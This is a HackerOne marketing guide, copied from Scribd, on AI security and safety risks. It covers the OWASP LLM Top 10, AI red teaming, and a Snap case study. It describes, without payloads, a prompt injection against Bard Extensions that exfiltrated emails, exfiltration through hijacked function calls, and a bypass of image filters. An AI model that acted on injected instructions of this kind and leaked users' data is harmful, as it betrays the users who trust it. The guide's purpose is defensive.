0% found this document useful (0 votes)

67 views34 pages

The Ultimate Guide To Ai - V3pdf

Uploaded by

AdolfoGarcia

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

67 views34 pages

The Ultimate Guide To Ai - V3pdf

Uploaded by

AdolfoGarcia

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 34

The Ultimate Guide

to Managing Ethical
and Security
Risks in AI
Contents
Introduction 3

The Current State of AI 4

Offensive AI Is Outpacing Defensive AI
Attack Surfaces Are Growing Exponentially
The Regulatory Landscape and Business Imperatives Are Evolving

The Risks: Top Vulnerabilities Affecting AI and Large Language Models 7

AI Safety vs. AI Security
The OWASP Top 10 Vulnerabilities for Large Language Model Applications
Real-World AI Hacking

The Opportunities: Collaborating with Hackers to Build and Deploy AI Quickly and Securely 12
Why Hackers Are the AI Experts You Need
The Top Generative AI and LLM Risks According to Hackers
The Evolution of Ethical Hackers in the Age of Generative AI

The Solution: AI Red Teaming 17

HackerOne’s Playbook for AI Red Teaming
HackerOne AI Red Teaming Capabilities
Impact and Results

Case Study: Snap, Inc. 22

The Challenge: AI Safety for Text-to-Image Technology
The Solution: Bug Bounty Model for Scalability
The Result: Snap’s Legacy of Increased AI Safety

Hai: Your AI Assistant in the HackerOne Platform 25

Effortless SAST / DAST Template Generation
Clear and Synthesized Vulnerability Insights
Tailored Remediation Advice
Efficient Hacker Communication
Hai API

Change the Future of AI With Us 31

Checklist for Implementing Safe and Secure AI 32

The Ultimate Guide to Managing Ethical and Security Risks in AI 2

Introduction Key Takeaways
Artificial intelligence (AI) is swiftly revolutionizing software The current state of AI
development and deployment across various sectors. At Offensive AI is outpacing defensive AI, attack surfaces are
HackerOne, our direct customer engagements provide unique growing exponentially, and regulatory agencies are trying to
insights into this evolution, characterized by a constant stream keep pace with the power of this technology.
of AI-powered innovations. This transformation is led by two Understand some of the ways bad actors are taking
key groups: AI developers and AI integrators. Developers are at advantage of this technology.
the forefront of creating foundational AI technologies, including
generative AI (GenAI) models, natural language processing, The risks
and large language models (LLMs). Meanwhile, integrators While AI poses positive advancements, it also creates risks that
like our customers Snap, Instacart, CrowdStrike, Priceline, individuals and organizations need to prepare for.
Cloudflare, X (Twitter), and Salesforce typically incorporate Learn about the safety and security risks inherent in GenAI.
these AI advancements into their offerings. Both developers and
integrators are dedicated to pushing AI forward in a manner that The opportunities
is innovative and safeguarded against emerging threats, ensuring Hackers are the experts the world needs to ensure AI is
that AI technologies remain competitive, ethical, and secure. developed and deployed safely, securely, and responsibly.
Who’s better equipped to safeguard new technology than those
As we edge closer to a future where AI is ubiquitous, it’s essential specializing in breaking it?
to consider its impact on various teams, including those focused Meet some of the 53% of hackers who are already using AI in
on security, trust, and compliance. What challenges and risks some way to keep organizations secure.
do these teams encounter, and how can AI help solve endemic
issues in these fields? This guide is designed to tackle these critical The solution
questions based on HackerOne’s experience and insights within AI red teaming is the optimal solution for AI safety and security—
the evolving AI landscape. and in some areas, it’s already mandated.
Learn how HackerOne's AI red teaming solution has generated
impactful results for customers.

The Ultimate Guide to Managing Ethical and Security Risks in AI 3

The Current State of AI
Two primary shifts are taking place in the wake of increasing AI prominence: the
dominance of offensive AI and the rapid expansion of the attack surface.

Offensive AI In the short term, and possibly indefinitely, convincing and fruitful than ever. GenAI
offensive or malicious AI applications lowers the barrier to entry, and phishing is

Is Outpacing
are outpacing defensive ones using AI getting even more convincing.
for stronger security. This is not a new
phenomenon: the offense vs. defense cat- Have you ever received a text from a

Defensive AI and-mouse game defines cybersecurity. random number claiming to be your CEO,
asking you to buy 500 gift cards? While
While GenAI offers tremendous you’re unlikely to fall for that trick, how would
opportunities to advance defensive use it differ if that phone call came from your
cases, cybercrime rings and malicious CEO’s phone number? What if it sounded
attackers will not let the AI opportunity pass exactly like your CEO, and the voice even
either. They will level up their weaponry, responded to your questions in real time?
potentially asymmetrically, to defensive That’s the power of AI voice cloning.
efforts—meaning there isn’t an equal Check out this Q&A with HackerOne senior
match between the two. Attacks like social solutions architect and AI hacker Dane
engineering via deepfakes will be more Sherrets to see it unravel live.

The Ultimate Guide to Managing Ethical and Security Risks in AI 4

Attack Surfaces Are
Growing Exponentially

We’re seeing an explosion in new attack of intelligence happen to be the largest

surfaces. Defenders have long followed models. In a GenAI-ubiquitous future,
the principle of attack surface reduction, organizations of all kinds will accumulate
a term Microsoft coined—the aim being to more and more data, beyond what we
protect your organization’s devices and may now think possible. Therefore, the
network by leaving attackers with fewer sheer scale and impact of data breaches
ways to execute attacks. However, the will grow out of control. Attackers are more
rapid commoditization of GenAI is going motivated than ever to get their hands
to reverse some of the attack surface on data. The dark web price of data “per
reduction progress. kilogram” is increasing.

The ability to generate code with GenAI Attack surface growth doesn’t stop there:
dramatically lowers the bar for who can in just the past few months, businesses
be a software engineer, resulting in more have rapidly implemented features and
and more code being shipped by people capabilities powered by GenAI. As with
who do not fully comprehend the technical any emerging technology, developers
implications of the software they develop, may not be fully aware of the ways their
let alone oversee the security implications. implementation can be exploited or
abused. Novel attacks against applications
Additionally, GenAI requires vast amounts powered by GenAI are emerging as a new
of data. It’s no surprise that the models that threat that defenders have to worry about.
continue to impress us with human levels

The Ultimate Guide to Managing Ethical and Security Risks in AI 5

The Regulatory Landscape and Business
Imperatives Are Evolving
As regulatory requirements and business imperatives surrounding AI testing become more prevalent, organizations must seamlessly integrate
AI red teaming and alignment testing into their risk management and software development practices. This strategic integration is crucial for
fostering a culture of responsible AI development and ensuring that AI technologies meet security and ethical expectations. Read more about
the regulatory landscape of AI from HackerOne’s chief policy officer.

European Union’s AI Act U.S. Federal Guidance

The European Union recently reached an The EU’s AI Act comes on the heels of U.S.
agreement on the AI Act, which sets several federal guidance such as the recent executive
requirements for trust and security for AI. order on safe and trustworthy AI, as well as
For some high-risk AI systems, requirements Federal Trade Commission guidance. These
include adversarial testing, risk assessment frameworks identify AI red teaming and
and mitigation, and cyber incident reporting, ongoing testing as key safeguards to help
among other security safeguards. ensure security and alignment.

As the boundaries of what’s possible with AI continue to expand, so do the responsibilities of those who wield it. For high-tech companies looking
to deploy GenAI, it’s crucial to adopt a proactive stance on cybersecurity. This means not only keeping pace with regulatory requirements and
integrating robust security measures but also fostering a culture of continuous innovation and ethical consideration. Balancing the drive for
competitive advantage with the imperative for security and safety is key to thriving in the evolving AI climate.

The Ultimate Guide to Managing Ethical and Security Risks in AI 6

The Risks: Top Vulnerabilities
Affecting AI & Large
Language Models
The pressure to rapidly adopt GenAI to boost productivity and
remain competitive has ramped up to an incredible level.
Concurrently, security leaders are trying to understand how
to leverage GenAl technology while ensuring protection from
inherent security issues and threats. This challenge includes
staying ahead of adversaries who may discover and exploit
malicious uses before organizations can address them.

The Ultimate Guide to Managing Ethical and Security Risks in AI 7

AI Safety vs.
AI Security

AI safety focuses on preventing AI systems from generating harmful On the other hand, AI security involves testing AI systems with the
content, from instructions for creating weapons to offensive goal of preventing bad actors from abusing the AI to, for example,
language and inappropriate imagery. It aims to ensure responsible compromise the confidentiality, integrity, or availability of the
use of AI and adherence to ethical standards. systems the AI is embedded in.

AI safety risks to organizations can result in: AI security risks to organizations can result in:

Spread of biased or unethical decision-making Disclosing sensitive or private information

Erosion of public trust in AI technologies and the organizations Providing access and functionality to unauthorized users
that deploy them
Compromising a model’s security, effectiveness, and ethical
Legal, regulatory, and financial liabilities for non-compliance behavior
with ethical standards
Doing extensive financial and reputational damage
Unintended consequences that could harm individuals or
society

The Ultimate Guide to Managing Ethical and Security Risks in AI 8

OWASP Top 10
Vulnerabilities #1 Prompt injection
The most commonly discussed LLM
vulnerability, in which an attacker manipulates

for Large Language the operation of a trusted LLM through crafted

inputs, either directly or indirectly.

Model Applications #2 Insecure output handling

Occurs when an LLM output is accepted
without scrutiny, potentially exposing backend
systems. This can, in some cases, lead to severe
consequences like XSS, CSRF, SSRF, privilege
escalation, or remote code execution.

The Open Web Application Security Project #3 Training data poisoning

Refers to the manipulation of data or
(OWASP) annually releases a number of fine-tuning of processes that introduce
comprehensive guides, including the “Top 10 vulnerabilities, backdoors, or biases and could
compromise the model’s security, effectiveness,
for LLM Applications,” about the most critical
or ethical behavior.
security risks to large language model (LLM)
applications. HackerOne is proud to have
#4 Model denial of service
had two team members contribute to this Happens when attackers trigger resource-
important initiative. Check out the HackerOne heavy operations on LLMs, leading to service
degradation or high costs.
blog for a deeper look into the introduction
and mitigation of these vulnerabilities.

The Ultimate Guide to Managing Ethical and Security Risks in AI 9

#5 Supply chain vulnerabilities #8 Excessive agency
The supply chain in LLMs can be vulnerable, impacting Typically caused by excessive functionality,
the integrity of training data, machine learning (ML) permissions, and or autonomy. One or more of these
models, and deployment platforms. Supply chain factors enables damaging actions to be performed in
vulnerabilities in LLMs can lead to biased outcomes, response to unexpected or ambiguous outputs from
security breaches, and even complete system failures. an LLM.

#6 Sensitive information #9 Overreliance

When systems or people depend on LLMs for decision-
disclosure making or content generation without sufficient
Happens when LLMs inadvertently reveal confidential oversight. Organizations and the individuals that
data, resulting in the exposure of proprietary comprise them can over-rely on LLMs without the
algorithms, intellectual property, and private or knowledge and validation mechanisms required to
personal information, leading to privacy violations and ensure information is accurate, vetted and secure.
other security breaches.
#10 Model theft
#7 Insecure plugin design Where there is unauthorized access, copying or
exfiltration of proprietary LLM models. This can lead to
The power and usefulness of LLMs can be extended
economic loss, reputational damage and unauthorized
with plugins. However, this does come with the risk of
introducing more vulnerable attack surfaces through access to highly sensitive data.
poor or insecure plugin design.

The Ultimate Guide to Managing Ethical and Security Risks in AI 10

Real-World AI Hacking
Ethical hackers now specialize in attacks, which can be delivered to users With such a powerful impact as the
finding vulnerabilities in AI models and without their consent. exfiltration of personal emails, the hackers
deployments. In fact, 62% of hackers in promptly reported this vulnerability to Google,
HackerOne’s annual survey said they In less than 24 hours from the launch of which resulted in a $20,000 bounty award.
plan to specialize in the OWASP Top 10 for Bard Extensions, the hackers were able to
LLM Applications. Hackers Joseph “rez0” demonstrate that: Bugs like this only scratch the surface of
Thacker, Justin “Rhynorater” Gardner, the novel vulnerabilities found in GenAI.
and Roni “Lupin” Carta collaborated to Google Bard was vulnerable to IDOR Organizations developing and deploying
and data injection attacks via data from
strengthen Google’s AI red teaming by GenAI and LLMs need security talent
Extensions.
hacking its GenAI assistant, Bard—now specializing in the OWASP Top 10 for LLMs if
Malicious image prompt injection
called Gemini. they are serious about competitively and
instructions will exploit the vulnerability.
securely introducing these technologies.
A prompt injection payload could
The launch of Bard’s Extensions AI feature
exfiltrate victims' emails.
provided Bard with access to Google
Drive, Google Docs, and Gmail. This meant
Bard would have access to personally
identifiable information and could even
read emails and access documents and
locations. The hackers identified that
Bard analyzed untrusted data and could
be susceptible to insecure direct object
reference (IDOR) and data injection

The Ultimate Guide to Managing Ethical and Security Risks in AI 11

The Opportunities:
Collaborating With Hackers
to Build and Deploy AI
Quickly & Securely

The Ultimate Guide to Managing Ethical and Security Risks in AI 12

Why Hackers Ethical hackers have been experimenting with Al systems since the day OpenAI announced
ChatGPT. Hackers are a collective force of intelligence and experimentation. They are curious and

Are the AI
talented individuals whose efforts can be scaled to help organizations deliver or implement AI at
a competitive speed and maintain safety and security.

Experts You HackerOne’s 7th Annual Hacker-Powered Security Report, released in late 2023, surveyed hackers
on their use of GenAI and their experience of hacking the technology.

Need Here’s what it found:

The Ultimate Guide to Managing Ethical and Security Risks in AI 13

The Top Generative AI and LLM
Risks According to Hackers
HackerOne has ongoing conversations with the hacking
community about its use of AI and the community’s latest
findings so we can keep our customers supplied with the most
up-to-date information and the best talent to support them.

According to hacker Gavin Klondike,

“We’ve almost forgotten the last 30 years of cybersecurity lessons in developing

some of this software.”

The haste of GenAI adoption has clouded many organizations’

judgment when it comes to the security of artificial intelligence.
Security researcher Katie Paxton-Fear, aka @InsiderPhD,
believes,

“This is a great opportunity to take a step back and bake some security in as this
is developing, and not bolting on security 10 years later.”

The Ultimate Guide to Managing Ethical and Security Risks in AI 14

While the OWASP Top 10 for LLMs is a comprehensive study of the types of vulnerabilities
that can affect GenAI models, we spoke to hackers to learn what they encounter most
often and which vulnerabilities organizations need to look out for:

Roni Carta, aka @arsene_lupin, points out that if

developers are using ChatGPT to help install prompt
packages on their computers, they can run into trouble
Prompt injections when asking it to find libraries. Carta says:

The OWASP Top 10 for LLM defines prompt injection as a vulnerability "ChatGPT hallucinates library names, which threat
during which an attacker manipulates the operation of a trusted LLM actors can then take advantage of by reverse-
through crafted inputs, either directly or indirectly. Paxton-Fear warns engineering the fake libraries."
about prompt injection, saying:

"As we see the technology mature and grow in complexity, there

will be more ways to break it. We’re already seeing vulnerabilities
specific to AI systems, such as prompt injection or getting the AI Agent access control
model to recall training data or poison the data. We need AI and
human intelligence to overcome these security challenges." "LLMs are as good as their data,” says Thacker.
“The most useful data is often private data."

Joseph Thacker, a.k.a @rez0, uses this example to help understand

According to Thacker, this creates an extremely difficult
the power of prompt injection:
problem in the form of agent access control. Access-control
issues are very common vulnerabilities found through the
"If an attacker uses prompt injection to take control of the context
HackerOne platform every day. Where access control goes
for the LLM function call, they can exfiltrate data by calling the
particularly wrong regarding AI agents is the mixing of data.
web browser feature and moving the data that are exfiltrated to
Thacker says AI agents tend to mix second-order data
the attacker’s side. Or, an attacker could email a prompt injection
access with privileged actions, exposing the most sensitive
payload to an LLM tasked with reading and replying to emails."
information to potentially be exploited by bad actors.

The Ultimate Guide to Managing Ethical and Security Risks in AI 15

The Evolution of Ethical Hackers in the Age
of Generative AI
During a panel featuring security experts from Zoom and Salesforce, hacker Tom Anthony predicted the change
in how hackers approach processes with AI:
“At a recent Live Hacking Event with Zoom, there were easter eg
eggs for hackers to find—and the hacker who
Naturally, as new solved them used LLMs to crack it. Hackers are able to use AI tto speed up their processes by, for example,
vulnerabilities rapidly extending the word lists when trying to brute-force systems.”

emerge from the

He also senses a distinct difference for hackers using automation, claiming AI will significantly uplevel the reading
rapid adoption of of source code. Anthony says, “Anywhere that companies are exposing source code, there will be systems
GenAI and LLMs, reading, analyzing, and reporting in an automated fashion.”

the hacker’s role

Hacker Jonathan Bouman uses ChatGPT to help hack technologies he’s not super confident with.
is also evolving. “I can hack web applications but not break new coding languages, which was the challenge at one
Live Hacking Event. I copied and pasted all the documentation provided (removing all references to the
company), gave it all the structures, and asked it, ‘Where would you start?’ It took a few prompts to ensure
it wasn’t hallucinating, and it did provide a few low-level bugs. Because I was in a room with 50 ethical
hackers, I was able to share my findings with a wider team, and we escalated two of those bugs into critical
vulnerabilities. I couldn’t have done it without ChatGPT, but I couldn’t have made the impact I did without the
hacking community.”

There are even new tools for the education of hacking LLMs—and, therefore, for identifying the vulnerabilities those
tools create. Tom Anthony uses “an online game for prompt injection where you work through lev
levels,
els, tricking
the GPT model to give you secrets. It’s all developing so quickly.”

The Ultimate Guide to Managing Ethical and Security Risks in AI 16

The Solution:
AI Red Teaming

We’ve established that ethical hackers What is AI red teaming?

are invaluable for finding security holes in AI red teaming is an approach that involves
AI models and deployments. This section thoroughly examining an AI system, including
looks at how you can get started with AI models and their software components,
engaging ethical hackers to specifically to identify safety and security concerns. This
look for issues that will help you secure process produces a list of issues and actionable
your GenAI projects. AI red teaming is the recommendations to fix them, adapting traditional
practice of stress-testing AI models and red teaming to the unique AI challenges.
deployments. This can be done with a
bug bounty, a pentest, or a time-bound
offensive testing challenge.

The Ultimate Guide to Managing Ethical and Security Risks in AI 17

HackerOne’s
Playbook for AI
Red Teaming
HackerOne partners with
leading technology firms to
evaluate their AI deployments
for safety and security issues.
The ethical hackers selected
for our early AI red teaming
exceeded all expectations. The
insights gleaned have shaped
HackerOne’s evolving playbook
for AI red teaming.

The Ultimate Guide to Managing Ethical and Security Risks in AI 18

Our approach builds upon a powerful, community-driven offensive testing model, which HackerOne has successfully
offered for over a decade, but with several modifications necessary for optimal AI safety and security engagements.

Team Collaboration Duration Context

composition and size and scope

A meticulously selected Collaboration among AI red Because AI technology is Unlike traditional security
and diverse team is the teaming members holds evolving so quickly, we’ve testers, AI red teamers must
backbone of an effective unparalleled significance, found that engagements fully understand the AI
assessment. Emphasizing often exceeding that of between 15 and 60 days system they are assessing.
diversity in background, traditional security testing. in duration work best to Collaborating closely with
experience, and skill sets is HackerOne has found a assess specific aspects of customers to establish a
pivotal for safeguarding AI. team size of 15-25 testers AI red teaming. However, a comprehensive context and
A blend of curiosity-driven strikes the right balance continuous engagement precise scope is essential.
thinkers, individuals with varied for effective engagements, without a defined end date This collaboration helps in
experiences, and those skilled bringing in diverse and global was adopted in at least a identifying the AI’s intended
in production LLM prompt perspectives. handful of cases. This method purpose, deployment
behavior yields the best results. of continuous AI red teaming environment, existing safety
pairs well with an existing bug and security measures, and
bounty program. any limitations.

Private vs. Incentive Empathy

public model and consent

While most AI red teams Tailoring the incentive model As many safety
operate in private due to is a critical aspect of the considerations may involve
the sensitivity of safety and AI red teaming playbook. encountering harmful
security issues, in some A hybrid economic model and offensive content, it is
instances, public engagement, that includes fixed-fee important to seek explicit
such as X’s algorithmic bias participation rewards in participation consent from
bounty challenge, has yielded conjunction with rewards for adults (18+ years of age), offer
significant success. achieving specific outcomes regular support for mental
(akin to bounties) has proven health, and encourage breaks
most effective. between assessments.

The Ultimate Guide to Managing Ethical and Security Risks in AI 19

HackerOne AI Red
Teaming Capabilities

Strategic & Flexible Scoping Rapid Deployment Power of AI + Hackers

Targeted vulnerability identification tailored The quick initiation of security testing A combination of AI/ML expertise with
to immediate security needs, enabling a programs to address urgent concerns, the unique perspectives of our diverse
custom engagement suited for your unique drawing on the community’s expertise hacker community to uncover and resolve
threat model or criteria. Get a strategic for swift, impactful assessment of sophisticated vulnerabilities.
resource and skill allocation without long- crucial security areas.
term commitments.

Intelligent Copilot

The use of Hai, our proprietary AI chatbot,

to enrich vulnerability report analysis and
improve dialogue with HackerOne’s
security researchers.

The Ultimate Guide to Managing Ethical and Security Risks in AI 20

Impact and Results

Within the HackerOne community,

active hackers specialize in of those hackers have In a single recent engagement,

prompt hacking and other participated in HackerOne’s a team of 18 quickly identified 26
AI security and safety testing. AI red teaming engagements valid findings within the initial 24
to date. hours and accumulated over 100
valid findings in the two-week
engagement.

In another notable example, the team put forth a challenge of bypassing significant protections built to prevent the
generation of images containing a swastika, a symbol associated with the Nazi regime during World War II. Given its
offensive nature and potential to promote hate, blocking its appearance in generated content is essential to ensure
ethical and responsible AI usage. A particularly creative hacker on the AI red team was able to swiftly bypass these
protections, and thanks to their discovery, the model has significantly improved its resilience against this type of abuse.

The Ultimate Guide to Managing Ethical and Security Risks in AI 21

Case Study:
Snap, Inc.

The Challenge:
AI Safety for Text-to-Image Technology
Snap has been developing new "We ran the AI red teaming exercise
This approach involved a new way
AI-powered functionality to before the launch of Snap’s first text-to-
of thinking about safety. Previously
expand its users’ creativity and image generative AI product. A picture is
the industry’s focus had been on
wanted to test the new features worth a thousand words, and we wanted
looking at patterns in user behavior
of its Generative AI Lens and to prevent inappropriate or shocking
to identify common risk cases. But
Text2Image products to stress- material from hurting our community. We
with text-to-image technology,
test the guardrails it had in place worked closely with Legal, Policy, Content
Snap wanted to assess the model’s
to help prevent the creation of Moderation, and Trust and Safety to
behavior to understand the rare
harmful content. design this red-teaming exercise."
instances of inappropriate content
that flaws in the model could enable.
— Ilana Arbisser, Technical Lead,
AI Safety at Snap Inc.

The Ultimate Guide to Managing Ethical and Security Risks in AI 22

The Solution:

Bug Bounty The Safety team had already identified concerned about being generated

Model for eight categories of harmful imagery they

wanted to test for, including violence, sex,
on the platform. Snap and HackerOne
adjusted bounties dynamically and

Scalability self-harm, and eating disorders. Snap continued to experiment with prices to
knew they wanted to do adversarial optimize for researcher engagement.
testing on the product, and a security
expert on their team suggested a bug Out of a wide pool of talented
bounty–style program. From there, we researchers, 21 experts from across
worked together to decide on a “Capture the globe were selected to participate
the Flag” (CTF)–style exercise that would in the exercise. Global diversity was
incentivize researchers to look for our crucial for covering harmful imagery
specific areas of concern. across different cultures, and the
researchers' mindset was key for
By setting bounties, we incentivized the breaking the models.
Snap community to test the product, and
to focus on the content they were most

The Ultimate Guide to Managing Ethical and Security Risks in AI 23

The Result:

Snap’s Legacy Snap was thorough about the content it wanted researchers to focus
on re-creating, providing a blueprint for future engagements. Many

of Increased AI organizations have policies against “harmful imagery,” but it’s subjective
and hard to measure accurately. Snap was very specific and descriptive
about the type of images it considered harmful to young people. The

Safety research and the subsequent findings have created benchmarks and
standards that will help other social media companies, which can use
the same flags to test for content.

Read the full case study

The Ultimate Guide to Managing Ethical and Security Risks in AI 24

Your AI Assistant in
the HackerOne Platform
At HackerOne, we embrace the Hai effortlessly translates natural
transformative power of AI, focusing language into precise queries,
on speed and efficiency in securing enriches vulnerability reports with
and advancing our technology. Our additional relevant context, and utilizes
commitment extends beyond assisting platform data to generate insightful
“Hai has significantly reduced the time
customers with the risks associated with recommendations. This cutting-edge
my team spends sifting through bug
their AI models and deployments; we technology is designed to revolutionize
reports or creating responses, allowing
fundamentally embed AI’s capabilities how our customers approach
us to focus more on resolving and
into our platform’s DNA. That’s where Hai, vulnerability response times, aiming to
communicating vulnerabilities quickly. ”
HackerOne’s GenAI copilot, comes in to streamline and enhance the efficiency of
— Alexander Hagenah, Head of Cyber
enhance the HackerOne platform with vulnerability management processes.
Controls, SIX Group
powerful AI functionalities.

The Ultimate Guide to Managing Ethical and Security Risks in AI 25

Hai’s benefits for customers include:

Effortless SAST / DAST Template Generation

Enhance scanner consistency
with Hai’s tailored templates,
minimizing errors and
boosting detection rates.

The Ultimate Guide to Managing Ethical and Security Risks in AI 26

Clear and
Synthesized
Vulnerability
Insights
Whether faced with intricate
reports or technical details, Hai
provides easily understandable
explanations of vulnerabilities,
enhancing comprehension and
accelerating analysis.

The Ultimate Guide to Managing Ethical and Security Risks in AI 27

Tailored Determine the best approach to fixing a vulnerability
by analyzing them with Hai and receiving personalized

Remediation
remediation advice, facilitating effective security
enhancements and speedy remediation.

Advice

The Ultimate Guide to Managing Ethical and Security Risks in AI 28

Efficient Hacker Ask Hai to craft elegant and
succinct messages to hackers on your

Communication
behalf, enhancing collaboration and
communication across language barriers.

“Utilizing Hai for translating

complex vulnerability findings
into remediation advice has been
a game changer for us. It bridges
the gap between our technical
reports and our internal audience,
enhancing the value of our
HackerOne program by making
actionable insights accessible to
everyone.”

— Vice President of Cybersecurity

at a Fortune 500 real estate
services and investment firm

The Ultimate Guide to Managing Ethical and Security Risks in AI 29

Hai API
Hai is accessible through the
HackerOne API, enabling users
to seamlessly incorporate Hai’s
capabilities into their existing
vulnerability management
processes and tooling.

The development of services like AI red

teaming and the launch of tools like Hai
represent important steps in improving
cybersecurity defenses as enterprises
deal with a constantly changing world of
cyberthreats. By utilizing AI to strengthen
security processes and expedite
vulnerability response times, we establish
industry standards and lay the groundwork
for a safer and more secure digital future.

The Ultimate Guide to Managing Ethical and Security Risks in AI 30

Change the
Future of AI
With Us
Emerging technologies are often developed with trust, safety, and security as afterthoughts.
HackerOne is changing the status quo. We are committed to enhancing security through safe, secure, and
confidential AI, tightly coupled with strong human oversight. Our goal is to provide organizations with the
tools they need to achieve security outcomes beyond what has been possible before— and to do it without
compromise.

As the demand for secure and safe AI grows, HackerOne remains dedicated to facilitating a present and
future where technology enhances our lives while upholding security and trust. To learn more about how to
strengthen your AI safety and security with AI red reaming, contact the team at HackerOne.

The Ultimate Guide to Managing Ethical and Security Risks in AI 31

Joint AI safety & security measures:

Red teaming: Incorporate both security and safety AI

red teaming as a standard practice for AI models and
applications.

Testing: Establish continuous testing, evaluation,

verification, and validation throughout the AI model life
cycle. Provide regular executive metrics and updates
on AI model functionality, security, reliability, and
robustness. Regularly scan and update the underlying
infrastructure and software for vulnerabilities.

Risk assessment: Conduct comprehensive risk

assessments to identify potential risks associated with
the AI system, including unintended consequences,
negative societal impacts, and misuse or abuse
scenarios.

Regulations and governance: Determine country, state,

or government-specific AI compliance requirements.
Some regulations exist around specific AI features, such
Whether your organization is looking to develop, as facial recognition and employment-related systems.
secure, or deploy AI or LLM, or you’re hoping to ensure Establish an AI governance framework outlining roles,
responsibilities, and ethical considerations, including
the security and ethical adherence of your existing incident response planning and risk management.
model, we’ve compiled a checklist for implementing
safe and secure AI. While not exhaustive for every Input and output security: Evaluate input validation
use case, this checklist can get you started. Ask methods, as well as how outputs are filtered, sanitized,
and approved.
the experts at HackerOne for more details on
safeguarding your AI.
Training: Train all users on ethics, responsibility, legal
issues, AI security risks, and best practices such as
warranty, license, and copyright. Establish a culture
of open and transparent communication on the
organization’s use of predictive or generative AI.

The Ultimate Guide to Managing Ethical and Security Risks in AI 32

AI safety measures: AI security measures:
Ethical considerations: Establish clear ethical principles Data security: Verify how data is classified and
and guidelines for the development and use of AI protected based on sensitivity, including personal
systems, addressing issues such as bias, transparency, and proprietary business data. Determine how user
accountability, and respect for human rights. permissions are managed and what safeguards are
in place.
Human oversight: Incorporate human oversight
and control mechanisms into AI systems, allowing for Access control: Implement least-privilege access
human intervention and decision-making in critical controls and defense-in-depth measures.
situations.
Training pipeline security: Require rigorous control
Explainability and transparency: Ensure that AI around training data governance, pipelines, models,
systems are explainable and transparent, enabling and algorithms.
users and stakeholders to understand how decisions
are made and the underlying reasoning. Monitoring and response: Map workflows, monitoring,
and responses to understand automation, logging,
Continuous monitoring: Establish mechanisms for and auditing. Confirm audit records are secure.
continuous monitoring of AI systems during operation,
to detect and respond to any deviations from expected Production release process: Include application
behavior or potential safety concerns. testing, source code review, vulnerability assessments,
infrastructure security, and AI red teaming in the
Responsibility and accountability: Clearly define production release process.
roles, responsibilities, and accountability measures for
the development, deployment, and use of AI systems, Supply chain security: Request third-party audits,
including processes for redress and remediation in penetration testing, and code reviews for third-party
case of harm or unintended consequences. providers, both initially and on an ongoing basis.

Stakeholder engagement: Involve diverse Measurement: Identify or expand metrics to

stakeholders, including affected communities, experts, benchmark generative cybersecurity AI against
and regulators, in the development and deployment of other approaches to measure expected productivity
AI systems to ensure a comprehensive understanding improvements. Stay updated with the latest
of potential impacts and concerns. advancements in AI security research and
best practices.

The Ultimate Guide to Managing Ethical and Security Risks in AI 33

The Ultimate Guide
to Managing Ethical
and Security Risks in AI

8th Annual Hacker Powered Security Report 2024 2025pdf
100% (1)
8th Annual Hacker Powered Security Report 2024 2025pdf
68 pages
Report State of Ai Cyber Security 2024 1714045778
No ratings yet
Report State of Ai Cyber Security 2024 1714045778
32 pages
Lakera AI Global GenAI Security Readiness Report (2024 Contributor)
No ratings yet
Lakera AI Global GenAI Security Readiness Report (2024 Contributor)
41 pages
AI in Cybersecurity - Report PDF
100% (2)
AI in Cybersecurity - Report PDF
28 pages
Securing Ai
No ratings yet
Securing Ai
16 pages
INSEAD Consulting Club Casebook 2021
100% (1)
INSEAD Consulting Club Casebook 2021
141 pages
The State OF AI Sercurity
No ratings yet
The State OF AI Sercurity
21 pages
AI and Cyber Security
No ratings yet
AI and Cyber Security
56 pages
AI Magazine
No ratings yet
AI Magazine
123 pages
2023 Black Unicorn Report
No ratings yet
2023 Black Unicorn Report
84 pages
AI Cyber
No ratings yet
AI Cyber
86 pages
SANS - Draft - Critical AI Security Controls V1.1
No ratings yet
SANS - Draft - Critical AI Security Controls V1.1
15 pages
Nomios - The Rise of AI in Cybersecurity
No ratings yet
Nomios - The Rise of AI in Cybersecurity
13 pages
Checkpoint Generative Ai For Cybersecurity
No ratings yet
Checkpoint Generative Ai For Cybersecurity
26 pages
HiddenLayer AI Threat Landscape Report 2025
No ratings yet
HiddenLayer AI Threat Landscape Report 2025
55 pages
AI in Cyber Security
No ratings yet
AI in Cyber Security
24 pages
AI Threats Landscape and Cybersecurity
No ratings yet
AI Threats Landscape and Cybersecurity
55 pages
Predicts 2024 Cybersecurity Ai
No ratings yet
Predicts 2024 Cybersecurity Ai
26 pages
Ai Threat Landscape 2024
No ratings yet
Ai Threat Landscape 2024
44 pages
2023 AI in Cybersecurity Report Enea
No ratings yet
2023 AI in Cybersecurity Report Enea
20 pages
Securing The Future of Ai
No ratings yet
Securing The Future of Ai
20 pages
IBM - Cybersecurity in The Era of Generative AI
No ratings yet
IBM - Cybersecurity in The Era of Generative AI
20 pages
Cyber Snapshot Issue 4
No ratings yet
Cyber Snapshot Issue 4
39 pages
Sophos Navigating The Ai Hype in Cybersecurity WP
No ratings yet
Sophos Navigating The Ai Hype in Cybersecurity WP
14 pages
AI Security and Zero Trust 1737087007
No ratings yet
AI Security and Zero Trust 1737087007
17 pages
AI Security IBM
No ratings yet
AI Security IBM
15 pages
Four Questions Cisos Ai en
No ratings yet
Four Questions Cisos Ai en
14 pages
Preventing Next-Generation Threats
No ratings yet
Preventing Next-Generation Threats
8 pages
In Cybersecurity: Rimberio Rimberio Rimberio
No ratings yet
In Cybersecurity: Rimberio Rimberio Rimberio
10 pages
The Role of GenAI in Cybersecurity
No ratings yet
The Role of GenAI in Cybersecurity
10 pages
Forrester Securing Generative AI
No ratings yet
Forrester Securing Generative AI
9 pages
TLSeries AI 030619
No ratings yet
TLSeries AI 030619
9 pages
Use Artificial Intelligence Combat Cyber
No ratings yet
Use Artificial Intelligence Combat Cyber
7 pages
Generative AI - Capabilities and Risks
No ratings yet
Generative AI - Capabilities and Risks
8 pages
SEC AI IA - Cibersecurity
No ratings yet
SEC AI IA - Cibersecurity
9 pages
How To Stop Gen AI Threats With Zero Trust
No ratings yet
How To Stop Gen AI Threats With Zero Trust
11 pages
Security Predictions 2024 - SPLUNK
No ratings yet
Security Predictions 2024 - SPLUNK
17 pages
Black Purple 3D Cybersecurity Keynote Presentation
No ratings yet
Black Purple 3D Cybersecurity Keynote Presentation
10 pages
How I Can Implement Artificial Intelligence Into Cyber Security
